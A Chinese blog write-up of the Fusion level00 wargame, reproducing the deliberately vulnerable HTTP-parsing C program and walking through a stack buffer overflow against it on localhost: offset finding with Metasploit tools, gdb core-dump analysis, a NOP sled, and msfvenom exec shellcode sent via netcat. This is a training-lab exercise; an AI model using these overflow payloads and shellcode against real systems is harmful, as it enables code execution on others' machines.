Fusion level00

经过半个多月的时间把Protostar完成了，休息了几天，继续做Fusion。

*********题外话开始**********

在大学期间就在纠结是否选择程序猿的道路，结果因长时间高负荷写代码会引发不适而放弃了，不得不赞一下调好一个BUG时那种feel。如今，当完成一道题目也会有这种feel~~~~

*********题外话结束**********

level00源码：

#include "../common/common.c"int fix_path(char *path){ char resolved[128]; if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open strcpy(path, resolved);}char *parse_http_request(){ char buffer[1024]; char *path; char *q; printf("[debug] buffer is at 0xx :-)\n", buffer); if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host"); if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request"); path = &buffer[4]; q = strchr(path, ' '); if(! q) errx(0, "No protocol version specified"); *q++ = 0; if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol"); fix_path(path); printf("trying to access %s\n", path); return path;}int main(int argc, char **argv, char **envp){ int fd; char *p; background_process(NAME, UID, GID); fd = serve_forever(PORT); set_io(fd); parse_http_request();}

Fusion的题目是Protostar的进阶版，难度也更难了，当然，level00还是个热身题。通过题目提示知道是个Stack问题，而且shellcode应该放在resolved之外。

既然是Stack问题，那就来个长点的字符串吧。

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_create.rb 150Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9fusion@fusion:~$ python -c "print 'GET /'+'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9' + ' HTTP/1.1'" | nc localhost 20000[debug] buffer is at 0xbf89b338 :-)

######################################################################

# 修改core文件生成路径的方法是： #

# sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern' #

######################################################################

通过gdb来查看core文件

fusion@fusion:/tmp$ sudo -s gdb --quiet --core=core.1368248639[sudo] password for fusion:[New LWP 2495]Core was generated by `./level00'.Program terminated with signal 11, Segmentation fault.#0  0x65413665 in ?? ()(gdb)

用pattern_offset.rb工具：

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_offset.rb 0x65413665139

由此可以得到溢出的字符修改EIP的位置在长度139的位置

接下来需要在输入中放进shellcode，通过core文件找到shellcode的位置。

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\xef\xbe\xad\xde' + ' HTTP/1.1' + '\x90'*100 + 'a'*100 " | nc localhost 20000[debug] buffer is at 0xbf89b338 :-)

***************

fusion@fusion:/tmp$ sudo -s gdb --core=core.1368255737GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08Copyright (C) 2011 Free Software Foundation, Inc.License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it.There is NO WARRANTY, to the extent permitted by law.  Type "show copying"and "show warranty" for details.This GDB was configured as "i686-linux-gnu".For bug reporting instructions, please see:.[New LWP 2833]Core was generated by `./level00'.Program terminated with signal 11, Segmentation fault.#0  0xdeadbeef in ?? ()(gdb) x/200x 0xbf89b3400xbf89b340:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b350:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b360:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b370:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b380:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b390:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b3a0:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b3b0:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b3c0:     0x61616161      0x61616161      0xdeadbeef      0x545448000xbf89b3d0:     0x2e312f50      0x90909031      0x90909090      0x909090900xbf89b3e0:     0x90909090      0x90909090      0x90909090      0x909090900xbf89b3f0:     0x90909090      0x90909090      0x90909090      0x909090900xbf89b400:     0x90909090      0x90909090      0x90909090      0x909090900xbf89b410:     0x90909090      0x90909090      0x90909090      0x909090900xbf89b420:     0x90909090      0x90909090      0x90909090      0x909090900xbf89b430:     0x90909090      0x90909090      0x61616190      0x616161610xbf89b440:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b450:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b460:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b470:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b480:     0x61616161      0x61616161      0x61616161      0x616161610xbf89b490:     0x0a616161      0x00000004      0xb77bc6e0      0x00000000

可以得到写的字符串从0xbf89b3d5开始记录。同样，在shellcode前面填充一些0x90。因此得到的payload格式应该是这样的：

GET /AAA……AA\x00\xb4\x89\xbf HTTP/1.10x90……0x90[SHELLCODE]

先获得一个shellcode：

fusion@fusion:/opt/metasploit-framework$ sudo -s ./msfvenom -p linux/x86/exec -f pl CMD="touch /tmp/fusion_for_zsz"[sudo] password for fusion:my $buf ="\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" ."\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00" ."\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75" ."\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57" ."\x53\x89\xe1\xcd\x80";

于是乎：

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\x10\xb4\x89\xbf' + ' HTTP/1.1' + '\x90'*100 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57\x53\x89\xe1\xcd\x80' " | nc localhost 20000[debug] buffer is at 0xbf89b338 :-)fusion@fusion:/tmp$ lltotal 912drwxrwxrwt 4 root  root     340 2013-05-11 17:30 ./drwxr-xr-x 1 root  root     240 2013-05-11 22:50 ../-rw------- 1 root  20000 196608 2013-05-11 15:03 core.1368248639-rw------- 1 root  20000 196608 2013-05-11 15:33 core.1368250392-rw------- 1 root  20000 196608 2013-05-11 15:36 core.1368250571-rw------- 1 root  20000 196608 2013-05-11 15:41 core.1368250870-rw------- 1 root  20000 196608 2013-05-11 15:46 core.1368251166-rw------- 1 root  20000 196608 2013-05-11 15:51 core.1368251470-rw------- 1 root  20000 196608 2013-05-11 16:02 core.1368252121-rw------- 1 root  20000 196608 2013-05-11 17:02 core.1368255737-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256578-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256609-rw------- 1 root  20000 196608 2013-05-11 17:19 core.1368256755-rw------- 1 root  20000 196608 2013-05-11 17:24 core.1368257093-rw-r--r-- 1 20000 20000      0 2013-05-11 17:30 fusion_for_zszdrwxrwxrwt 2 root  root      40 2013-05-11 22:50 .ICE-unix/drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .X11-unix/